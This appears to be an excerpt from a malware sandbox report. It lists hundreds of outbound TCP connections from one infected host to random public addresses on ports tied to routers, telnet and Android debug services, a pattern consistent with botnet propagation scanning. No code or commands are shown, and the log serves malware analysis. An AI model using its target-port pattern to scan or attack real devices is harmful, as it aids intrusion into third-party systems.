                Source: global trafficTCP traffic: 192.168.2.20:47808 -> 7.108.184.228:49152
                Source: global trafficTCP traffic: 192.168.2.20:35406 -> 34.9.142.75:49152
                Source: global trafficTCP traffic: 192.168.2.20:51474 -> 117.254.218.74:49152
                Source: global trafficTCP traffic: 192.168.2.20:35366 -> 199.53.125.193:7574
                Source: global trafficTCP traffic: 192.168.2.20:46094 -> 105.32.8.235:8080
                Source: global trafficTCP traffic: 192.168.2.20:55200 -> 149.10.244.182:7574
                Source: global trafficTCP traffic: 192.168.2.20:48964 -> 34.106.39.153:8080
                Source: global trafficTCP traffic: 192.168.2.20:49094 -> 80.230.157.194:8443
                Source: global trafficTCP traffic: 192.168.2.20:57356 -> 119.52.222.172:8080
                Source: global trafficTCP traffic: 192.168.2.20:57526 -> 76.0.10.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:57584 -> 193.81.154.165:7574
                Source: global trafficTCP traffic: 192.168.2.20:52596 -> 215.1.190.118:8080
                Source: global trafficTCP traffic: 192.168.2.20:41596 -> 16.179.214.74:8080
                Source: global trafficTCP traffic: 192.168.2.20:55882 -> 90.153.163.206:5555
                Source: global trafficTCP traffic: 192.168.2.20:46048 -> 102.112.99.110:8080
                Source: global trafficTCP traffic: 192.168.2.20:46072 -> 52.224.63.176:52869
                Source: global trafficTCP traffic: 192.168.2.20:37640 -> 179.5.44.160:8443
                Source: global trafficTCP traffic: 192.168.2.20:33648 -> 147.209.183.102:8080
                Source: global trafficTCP traffic: 192.168.2.20:51958 -> 47.208.112.60:8080
                Source: global trafficTCP traffic: 192.168.2.20:57910 -> 13.198.237.32:81
                Source: global trafficTCP traffic: 192.168.2.20:59648 -> 191.159.187.60:5555
                Source: global trafficTCP traffic: 192.168.2.20:48938 -> 207.188.217.55:8443
                Source: global trafficTCP traffic: 192.168.2.20:37396 -> 138.184.234.192:7574
                Source: global trafficTCP traffic: 192.168.2.20:41582 -> 2.252.1.26:8080
                Source: global trafficTCP traffic: 192.168.2.20:38130 -> 186.198.44.96:52869
                Source: global trafficTCP traffic: 192.168.2.20:57636 -> 110.127.34.195:7574
                Source: global trafficTCP traffic: 192.168.2.20:37792 -> 130.11.96.200:37215
                Source: global trafficTCP traffic: 192.168.2.20:49410 -> 142.162.240.88:37215
                Source: global trafficTCP traffic: 192.168.2.20:46788 -> 194.66.198.59:8080
                Source: global trafficTCP traffic: 192.168.2.20:37572 -> 59.87.199.121:5555
                Source: global trafficTCP traffic: 192.168.2.20:37146 -> 31.33.198.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:37388 -> 41.67.135.38:8080
                Source: global trafficTCP traffic: 192.168.2.20:46758 -> 9.120.123.80:5555
                Source: global trafficTCP traffic: 192.168.2.20:42400 -> 165.11.161.224:52869
                Source: global trafficTCP traffic: 192.168.2.20:33604 -> 75.20.211.169:7574
                Source: global trafficTCP traffic: 192.168.2.20:39084 -> 108.108.45.183:8443
                Source: global trafficTCP traffic: 192.168.2.20:56146 -> 186.179.212.59:37215
                Source: global trafficTCP traffic: 192.168.2.20:36096 -> 84.56.89.143:8080
                Source: global trafficTCP traffic: 192.168.2.20:49716 -> 11.34.180.15:8080
                Source: global trafficTCP traffic: 192.168.2.20:54490 -> 171.106.42.2:8080
                Source: global trafficTCP traffic: 192.168.2.20:60286 -> 120.58.188.59:8080
                Source: global trafficTCP traffic: 192.168.2.20:53470 -> 152.55.230.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:36520 -> 138.77.221.45:81
                Source: global trafficTCP traffic: 192.168.2.20:53866 -> 48.158.121.17:8080
                Source: global trafficTCP traffic: 192.168.2.20:37498 -> 25.239.173.92:8080
                Source: global trafficTCP traffic: 192.168.2.20:48316 -> 98.15.164.97:8443
                Source: global trafficTCP traffic: 192.168.2.20:51442 -> 60.167.18.127:49152
                Source: global trafficTCP traffic: 192.168.2.20:59930 -> 149.79.115.130:7574
                Source: global trafficTCP traffic: 192.168.2.20:56084 -> 84.40.97.17:37215
                Source: global trafficTCP traffic: 192.168.2.20:59828 -> 173.7.142.106:49152
                Source: global trafficTCP traffic: 192.168.2.20:49642 -> 82.239.159.226:81
                Source: global trafficTCP traffic: 192.168.2.20:51430 -> 105.32.129.130:8443
                Source: global trafficTCP traffic: 192.168.2.20:40780 -> 96.172.67.87:8080
                Source: global trafficTCP traffic: 192.168.2.20:33320 -> 91.18.148.170:8080
                Source: global trafficTCP traffic: 192.168.2.20:58354 -> 97.233.31.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:38556 -> 18.236.119.78:7574
                Source: global trafficTCP traffic: 192.168.2.20:44540 -> 163.192.137.169:37215
                Source: global trafficTCP traffic: 192.168.2.20:43944 -> 140.6.78.199:49152
                Source: global trafficTCP traffic: 192.168.2.20:47648 -> 88.121.162.132:7574
                Source: global trafficTCP traffic: 192.168.2.20:42346 -> 86.54.3.250:5555
                Source: global trafficTCP traffic: 192.168.2.20:53840 -> 139.58.181.193:8080
                Source: global trafficTCP traffic: 192.168.2.20:57356 -> 43.224.146.113:8080
                Source: global trafficTCP traffic: 192.168.2.20:45520 -> 124.156.101.207:5555
                Source: global trafficTCP traffic: 192.168.2.20:35854 -> 213.15.5.141:49152
                Source: global trafficTCP traffic: 192.168.2.20:51448 -> 22.102.33.44:37215
                Source: global trafficTCP traffic: 192.168.2.20:44808 -> 136.5.82.110:49152
                Source: global trafficTCP traffic: 192.168.2.20:44976 -> 106.234.149.13:8080
                Source: global trafficTCP traffic: 192.168.2.20:45254 -> 45.175.218.157:49152
                Source: global trafficTCP traffic: 192.168.2.20:43748 -> 73.234.35.172:81
                Source: global trafficTCP traffic: 192.168.2.20:57144 -> 39.160.28.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:59196 -> 109.132.130.36:8080
                Source: global trafficTCP traffic: 192.168.2.20:35172 -> 40.109.52.109:7574
                Source: global trafficTCP traffic: 192.168.2.20:48020 -> 144.177.63.135:81
                Source: global trafficTCP traffic: 192.168.2.20:34228 -> 198.246.42.190:7574
                Source: global trafficTCP traffic: 192.168.2.20:47856 -> 204.71.20.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:55410 -> 6.94.160.221:37215
                Source: global trafficTCP traffic: 192.168.2.20:35130 -> 105.55.198.173:81
                Source: global trafficTCP traffic: 192.168.2.20:46870 -> 134.216.132.209:8080
                Source: global trafficTCP traffic: 192.168.2.20:52962 -> 197.197.179.204:7574
                Source: global trafficTCP traffic: 192.168.2.20:38224 -> 114.115.195.219:5555
                Source: global trafficTCP traffic: 192.168.2.20:39628 -> 31.112.44.50:5555
                Source: global trafficTCP traffic: 192.168.2.20:58720 -> 65.184.246.105:52869
                Source: global trafficTCP traffic: 192.168.2.20:45640 -> 116.193.191.147:5555
                Source: global trafficTCP traffic: 192.168.2.20:42190 -> 88.153.187.49:8443
                Source: global trafficTCP traffic: 192.168.2.20:46074 -> 173.147.84.217:52869
                Source: global trafficTCP traffic: 192.168.2.20:55164 -> 5.76.27.230:7574
                Source: global trafficTCP traffic: 192.168.2.20:44464 -> 31.157.161.123:37215
                Source: global trafficTCP traffic: 192.168.2.20:48894 -> 165.222.20.146:8080
                Source: global trafficTCP traffic: 192.168.2.20:38654 -> 164.69.135.124:37215
                Source: global trafficTCP traffic: 192.168.2.20:39828 -> 163.216.121.236:8080
                Source: global trafficTCP traffic: 192.168.2.20:44614 -> 144.89.67.225:37215
                Source: global trafficTCP traffic: 192.168.2.20:34464 -> 204.185.64.60:37215
                Source: global trafficTCP traffic: 192.168.2.20:48126 -> 55.81.150.224:37215
                Source: global trafficTCP traffic: 192.168.2.20:50982 -> 52.0.157.125:52869
                Source: global trafficTCP traffic: 192.168.2.20:48330 -> 211.36.253.8:8080
                Source: global trafficTCP traffic: 192.168.2.20:50230 -> 178.220.64.117:8080
                Source: global trafficTCP traffic: 192.168.2.20:53526 -> 135.53.39.119:49152
                Source: global trafficTCP traffic: 192.168.2.20:57654 -> 113.120.152.5:8080
                Source: global trafficTCP traffic: 192.168.2.20:52062 -> 27.208.150.177:8443
                Source: global trafficTCP traffic: 192.168.2.20:59332 -> 185.245.247.220:7574
                Source: global trafficTCP traffic: 192.168.2.20:55230 -> 74.79.90.89:8080
                Source: global trafficTCP traffic: 192.168.2.20:33548 -> 194.159.135.166:8080
                Source: global trafficTCP traffic: 192.168.2.20:45030 -> 186.96.51.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:54464 -> 44.163.103.21:37215
                Source: global trafficTCP traffic: 192.168.2.20:47064 -> 119.178.225.96:81
                Source: global trafficTCP traffic: 192.168.2.20:53248 -> 140.40.46.56:52869
                Source: global trafficTCP traffic: 192.168.2.20:41556 -> 47.128.19.145:81
                Source: global trafficTCP traffic: 192.168.2.20:58864 -> 60.50.138.0:8080
                Source: global trafficTCP traffic: 192.168.2.20:54388 -> 80.211.20.126:49152
                Source: global trafficTCP traffic: 192.168.2.20:55010 -> 160.208.85.97:8080
                Source: global trafficTCP traffic: 192.168.2.20:46172 -> 13.71.215.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:44906 -> 52.176.144.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:54134 -> 146.168.208.157:37215
                Source: global trafficTCP traffic: 192.168.2.20:52222 -> 14.81.232.70:49152
                Source: global trafficTCP traffic: 192.168.2.20:50070 -> 148.189.123.241:8080
                Source: global trafficTCP traffic: 192.168.2.20:35258 -> 78.91.242.78:37215
                Source: global trafficTCP traffic: 192.168.2.20:33720 -> 153.123.234.159:8443
                Source: global trafficTCP traffic: 192.168.2.20:51852 -> 196.101.144.179:37215
                Source: global trafficTCP traffic: 192.168.2.20:40784 -> 162.254.84.124:7574
                Source: global trafficTCP traffic: 192.168.2.20:44836 -> 214.196.245.191:37215
                Source: global trafficTCP traffic: 192.168.2.20:45086 -> 99.70.118.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:54474 -> 221.69.238.49:8080
                Source: global trafficTCP traffic: 192.168.2.20:35514 -> 73.31.128.199:37215
                Source: global trafficTCP traffic: 192.168.2.20:38780 -> 120.17.249.56:5555
                Source: global trafficTCP traffic: 192.168.2.20:49418 -> 221.254.99.41:5555
                Source: global trafficTCP traffic: 192.168.2.20:33682 -> 202.247.214.124:5555
                Source: global trafficTCP traffic: 192.168.2.20:50462 -> 194.215.108.22:8080
                Source: global trafficTCP traffic: 192.168.2.20:46150 -> 221.98.57.70:8080
                Source: global trafficTCP traffic: 192.168.2.20:48076 -> 9.100.3.73:8080
                Source: global trafficTCP traffic: 192.168.2.20:48646 -> 55.94.52.202:7574
                Source: global trafficTCP traffic: 192.168.2.20:43004 -> 220.108.199.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:43390 -> 134.78.201.24:5555
                Source: global trafficTCP traffic: 192.168.2.20:34046 -> 184.185.74.165:49152
                Source: global trafficTCP traffic: 192.168.2.20:43276 -> 205.107.77.143:8080
                Source: global trafficTCP traffic: 192.168.2.20:43650 -> 193.94.174.79:37215
                Source: global trafficTCP traffic: 192.168.2.20:37710 -> 59.39.113.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:33160 -> 128.62.193.183:49152
                Source: global trafficTCP traffic: 192.168.2.20:51754 -> 85.247.17.231:8080
                Source: global trafficTCP traffic: 192.168.2.20:35656 -> 126.249.0.35:5555
                Source: global trafficTCP traffic: 192.168.2.20:57060 -> 103.125.148.38:8080
                Source: global trafficTCP traffic: 192.168.2.20:50944 -> 22.13.23.29:8080
                Source: global trafficTCP traffic: 192.168.2.20:56504 -> 129.86.130.59:52869
                Source: global trafficTCP traffic: 192.168.2.20:59416 -> 99.47.34.28:49152
                Source: global trafficTCP traffic: 192.168.2.20:43546 -> 212.130.124.164:8080
                Source: global trafficTCP traffic: 192.168.2.20:55830 -> 212.49.144.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:38598 -> 54.185.114.20:8080
                Source: global trafficTCP traffic: 192.168.2.20:51730 -> 32.18.89.90:8443
                Source: global trafficTCP traffic: 192.168.2.20:33064 -> 166.58.177.197:37215
                Source: global trafficTCP traffic: 192.168.2.20:47416 -> 141.248.130.228:49152
                Source: global trafficTCP traffic: 192.168.2.20:32792 -> 179.158.180.205:8080
                Source: global trafficTCP traffic: 192.168.2.20:52230 -> 102.190.117.35:81
                Source: global trafficTCP traffic: 192.168.2.20:34702 -> 67.98.221.132:8080
                Source: global trafficTCP traffic: 192.168.2.20:46840 -> 57.124.181.88:81
                Source: global trafficTCP traffic: 192.168.2.20:39668 -> 132.16.154.147:8080
                Source: global trafficTCP traffic: 192.168.2.20:50786 -> 88.113.75.229:81
                Source: global trafficTCP traffic: 192.168.2.20:48264 -> 217.103.71.102:49152
                Source: global trafficTCP traffic: 192.168.2.20:39872 -> 64.193.108.89:7574
                Source: global trafficTCP traffic: 192.168.2.20:51680 -> 93.120.221.240:8080
                Source: global trafficTCP traffic: 192.168.2.20:49098 -> 162.190.197.9:8443
                Source: global trafficTCP traffic: 192.168.2.20:49002 -> 160.187.96.95:5555
                Source: global trafficTCP traffic: 192.168.2.20:32804 -> 8.169.91.139:52869
                Source: global trafficTCP traffic: 192.168.2.20:51912 -> 140.179.8.230:81
                Source: global trafficTCP traffic: 192.168.2.20:33742 -> 214.213.101.21:5555
                Source: global trafficTCP traffic: 192.168.2.20:55182 -> 203.23.182.178:5555
                Source: global trafficTCP traffic: 192.168.2.20:57070 -> 193.29.122.130:37215
                Source: global trafficTCP traffic: 192.168.2.20:35690 -> 197.18.203.47:8080
                Source: global trafficTCP traffic: 192.168.2.20:40750 -> 61.227.232.149:8080
                Source: global trafficTCP traffic: 192.168.2.20:34032 -> 128.78.172.160:8443
                Source: global trafficTCP traffic: 192.168.2.20:34916 -> 78.74.223.1:37215
                Source: global trafficTCP traffic: 192.168.2.20:51370 -> 182.48.45.177:5555
                Source: global trafficTCP traffic: 192.168.2.20:49740 -> 165.150.135.185:81
                Source: global trafficTCP traffic: 192.168.2.20:45682 -> 17.48.96.114:7574
                Source: global trafficTCP traffic: 192.168.2.20:54440 -> 16.118.154.91:8080
                Source: global trafficTCP traffic: 192.168.2.20:53506 -> 199.153.89.155:7574
                Source: global trafficTCP traffic: 192.168.2.20:59578 -> 117.1.97.153:37215
                Source: global trafficTCP traffic: 192.168.2.20:35902 -> 150.49.127.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:48474 -> 152.199.134.80:8080
                Source: global trafficTCP traffic: 192.168.2.20:33494 -> 22.55.173.236:8080
                Source: global trafficTCP traffic: 192.168.2.20:43956 -> 116.103.130.222:5555
                Source: global trafficTCP traffic: 192.168.2.20:55328 -> 55.177.210.173:52869
                Source: global trafficTCP traffic: 192.168.2.20:48226 -> 180.73.169.36:37215
                Source: global trafficTCP traffic: 192.168.2.20:54022 -> 80.173.222.186:5555
                Source: global trafficTCP traffic: 192.168.2.20:33238 -> 83.145.58.251:8080
                Source: global trafficTCP traffic: 192.168.2.20:54474 -> 154.123.116.128:81
                Source: global trafficTCP traffic: 192.168.2.20:58546 -> 95.244.105.198:52869
                Source: global trafficTCP traffic: 192.168.2.20:48380 -> 73.110.226.72:81
                Source: global trafficTCP traffic: 192.168.2.20:51856 -> 7.143.196.100:7574
                Source: global trafficTCP traffic: 192.168.2.20:60952 -> 200.172.177.133:49152
                Source: global trafficTCP traffic: 192.168.2.20:52122 -> 220.195.77.197:8080
                Source: global trafficTCP traffic: 192.168.2.20:38930 -> 37.94.172.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:33300 -> 113.151.155.155:7574
                Source: global trafficTCP traffic: 192.168.2.20:38872 -> 128.69.73.19:49152
                Source: global trafficTCP traffic: 192.168.2.20:38158 -> 143.27.173.36:37215
                Source: global trafficTCP traffic: 192.168.2.20:60954 -> 35.248.184.105:37215
                Source: global trafficTCP traffic: 192.168.2.20:57952 -> 79.20.246.25:81
                Source: global trafficTCP traffic: 192.168.2.20:47112 -> 63.32.104.39:7574
                Source: global trafficTCP traffic: 192.168.2.20:45204 -> 4.107.52.169:8443
                Source: global trafficTCP traffic: 192.168.2.20:50824 -> 158.166.109.92:8443
                Source: global trafficTCP traffic: 192.168.2.20:60710 -> 124.173.58.110:8080
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 150.251.37.244:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 90.174.187.153:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 31.89.219.2:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 102.100.217.96:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 18.105.207.147:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 190.157.11.194:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 43.53.171.173:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 86.99.210.57:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 112.58.7.129:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 58.162.55.56:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 88.78.65.223:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 220.238.66.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 209.147.41.3:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 123.27.145.228:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 62.237.192.89:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 99.222.227.88:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 141.106.171.91:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 154.35.38.40:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 38.41.215.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 164.145.194.191:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 167.162.64.76:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 141.1.164.22:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 104.65.164.249:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 31.203.218.231:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 208.24.53.147:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 93.125.79.29:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 12.217.1.33:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 34.175.42.70:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 178.143.250.24:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 70.222.43.28:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 179.59.114.218:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 180.224.65.62:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 102.94.171.34:2323
                Source: global trafficTCP traffic: 192.168.2.20:53230 -> 188.98.239.62:8080
                Source: global trafficTCP traffic: 192.168.2.20:38504 -> 9.100.19.116:37215
                Source: global trafficTCP traffic: 192.168.2.20:51976 -> 55.81.183.13:7574
                Source: global trafficTCP traffic: 192.168.2.20:40800 -> 41.15.105.103:81
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 46.53.122.52:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 128.2.202.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 191.255.172.135:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 156.115.2.35:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 151.208.44.78:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 221.38.132.116:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 60.92.23.230:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 9.121.228.46:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 157.36.120.230:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 217.134.229.221:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 75.177.226.1:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 222.193.130.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 152.249.246.144:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 65.220.27.102:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 205.136.140.70:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 177.202.164.81:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 132.251.146.76:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 78.77.170.194:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 59.24.29.139:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 70.236.172.76:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 190.204.120.220:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 162.234.103.103:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 150.130.200.215:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 139.183.35.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 98.86.56.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 218.183.188.145:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 156.2.191.200:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 109.152.110.66:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 73.115.24.64:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 39.91.113.59:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 124.51.165.116:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 142.62.53.56:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 118.191.27.120:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 175.45.127.111:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 87.214.75.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 85.248.81.232:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 166.246.119.125:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 38.86.147.101:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 200.80.233.162:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 119.239.185.199:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 47.124.185.211:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 145.202.40.191:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 90.12.152.232:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 12.82.102.244:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 189.247.28.210:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 175.73.120.141:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 117.50.196.155:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 145.125.125.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 80.90.230.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 105.85.84.70:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 14.61.47.227:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 217.114.8.172:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 27.209.210.68:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 79.82.147.31:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 141.63.11.11:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 110.51.33.149:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 156.126.91.176:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 98.101.142.31:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 86.83.149.144:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 149.239.97.222:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 115.13.194.56:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 76.224.31.105:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 177.156.213.51:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 66.241.77.173:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 53.202.144.36:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 117.96.106.239:2323
                Source: global trafficTCP traffic: 192.168.2.20:59014 -> 107.83.32.38:37215
                Source: global trafficTCP traffic: 192.168.2.20:50588 -> 42.102.110.42:5555
                Source: global trafficTCP traffic: 192.168.2.20:57110 -> 63.86.4.143:5555
                Source: global trafficTCP traffic: 192.168.2.20:55008 -> 5.19.225.53:49152
                Source: global trafficTCP traffic: 192.168.2.20:47454 -> 1.49.50.146:8080
                Source: global trafficTCP traffic: 192.168.2.20:58792 -> 27.119.64.213:5555
                Source: global trafficTCP traffic: 192.168.2.20:54696 -> 77.61.9.118:8080
                Source: global trafficTCP traffic: 192.168.2.20:60754 -> 215.25.1.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:34238 -> 85.65.166.46:7574
                Source: global trafficTCP traffic: 192.168.2.20:39582 -> 92.9.6.106:81
                Source: global trafficTCP traffic: 192.168.2.20:51178 -> 17.200.108.90:8080
                Source: global trafficTCP traffic: 192.168.2.20:43650 -> 188.125.124.130:5555
                Source: global trafficTCP traffic: 192.168.2.20:59600 -> 143.186.223.47:37215
                Source: global trafficTCP traffic: 192.168.2.20:41988 -> 174.61.123.4:81
                Source: global trafficTCP traffic: 192.168.2.20:57856 -> 129.203.155.83:81
                Source: global trafficTCP traffic: 192.168.2.20:46736 -> 199.190.84.76:8080
                Source: global trafficTCP traffic: 192.168.2.20:43764 -> 129.70.201.124:52869
                Source: global trafficTCP traffic: 192.168.2.20:38470 -> 34.159.208.93:8443
                Source: global trafficTCP traffic: 192.168.2.20:44192 -> 5.106.254.98:49152
                Source: global trafficTCP traffic: 192.168.2.20:35270 -> 153.19.67.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:47912 -> 119.109.91.45:5555
                Source: global trafficTCP traffic: 192.168.2.20:47858 -> 9.127.16.222:52869
                Source: global trafficTCP traffic: 192.168.2.20:60670 -> 187.160.72.23:5555
                Source: global trafficTCP traffic: 192.168.2.20:37266 -> 167.252.75.82:81
                Source: global trafficTCP traffic: 192.168.2.20:50044 -> 174.104.214.106:8080
                Source: global trafficTCP traffic: 192.168.2.20:60548 -> 110.222.0.17:5555
                Source: global trafficTCP traffic: 192.168.2.20:53782 -> 79.128.254.138:8080
                Source: global trafficTCP traffic: 192.168.2.20:40814 -> 100.195.166.208:8080
                Source: global trafficTCP traffic: 192.168.2.20:42136 -> 208.105.114.125:8080
                Source: global trafficTCP traffic: 192.168.2.20:50720 -> 64.143.91.44:8080
                Source: global trafficTCP traffic: 192.168.2.20:49548 -> 49.66.2.12:37215
                Source: global trafficTCP traffic: 192.168.2.20:56608 -> 78.18.247.141:8080
                Source: global trafficTCP traffic: 192.168.2.20:33014 -> 91.192.142.0:8080
                Source: global trafficTCP traffic: 192.168.2.20:51224 -> 218.129.240.16:8080
                Source: global trafficTCP traffic: 192.168.2.20:52082 -> 31.83.182.95:8080
                Source: global trafficTCP traffic: 192.168.2.20:39828 -> 103.139.115.132:37215
                Source: global trafficTCP traffic: 192.168.2.20:59454 -> 37.164.216.115:7574
                Source: global trafficTCP traffic: 192.168.2.20:49520 -> 39.11.180.76:8080
                Source: global trafficTCP traffic: 192.168.2.20:40372 -> 220.36.69.33:49152
                Source: global trafficTCP traffic: 192.168.2.20:49754 -> 145.28.141.26:8080
                Source: global trafficTCP traffic: 192.168.2.20:52780 -> 2.194.123.64:5555
                Source: global trafficTCP traffic: 192.168.2.20:57560 -> 142.102.31.151:7574
                Source: global trafficTCP traffic: 192.168.2.20:33620 -> 185.42.0.160:8080
                Source: global trafficTCP traffic: 192.168.2.20:48018 -> 204.183.59.253:81
                Source: global trafficTCP traffic: 192.168.2.20:53468 -> 146.186.244.99:49152
                Source: global trafficTCP traffic: 192.168.2.20:60412 -> 38.133.161.16:37215
                Source: global trafficTCP traffic: 192.168.2.20:60784 -> 102.121.26.169:5555
                Source: global trafficTCP traffic: 192.168.2.20:38416 -> 37.29.125.175:37215
                Source: global trafficTCP traffic: 192.168.2.20:33358 -> 37.251.207.177:7574
                Source: global trafficTCP traffic: 192.168.2.20:58532 -> 166.62.251.181:37215
                Source: global trafficTCP traffic: 192.168.2.20:44362 -> 155.235.243.131:8080
                Source: global trafficTCP traffic: 192.168.2.20:57086 -> 11.183.123.93:8080
                Source: global trafficTCP traffic: 192.168.2.20:55174 -> 215.207.144.3:49152
                Source: global trafficTCP traffic: 192.168.2.20:48760 -> 128.178.98.38:5555
                Source: global trafficTCP traffic: 192.168.2.20:54968 -> 195.234.15.147:8080
                Source: global trafficTCP traffic: 192.168.2.20:39402 -> 48.78.220.237:8443
                Source: global trafficTCP traffic: 192.168.2.20:55900 -> 15.34.35.162:81
                Source: global trafficTCP traffic: 192.168.2.20:45648 -> 88.237.131.5:52869
                Source: global trafficTCP traffic: 192.168.2.20:33386 -> 111.66.60.152:7574
                Source: global trafficTCP traffic: 192.168.2.20:49664 -> 217.8.168.203:37215
                Source: global trafficTCP traffic: 192.168.2.20:52430 -> 139.220.137.236:49152
                Source: global trafficTCP traffic: 192.168.2.20:57944 -> 7.24.188.177:37215
                Source: global trafficTCP traffic: 192.168.2.20:56768 -> 117.236.45.24:7574
                Source: global trafficTCP traffic: 192.168.2.20:34768 -> 84.167.218.252:8080
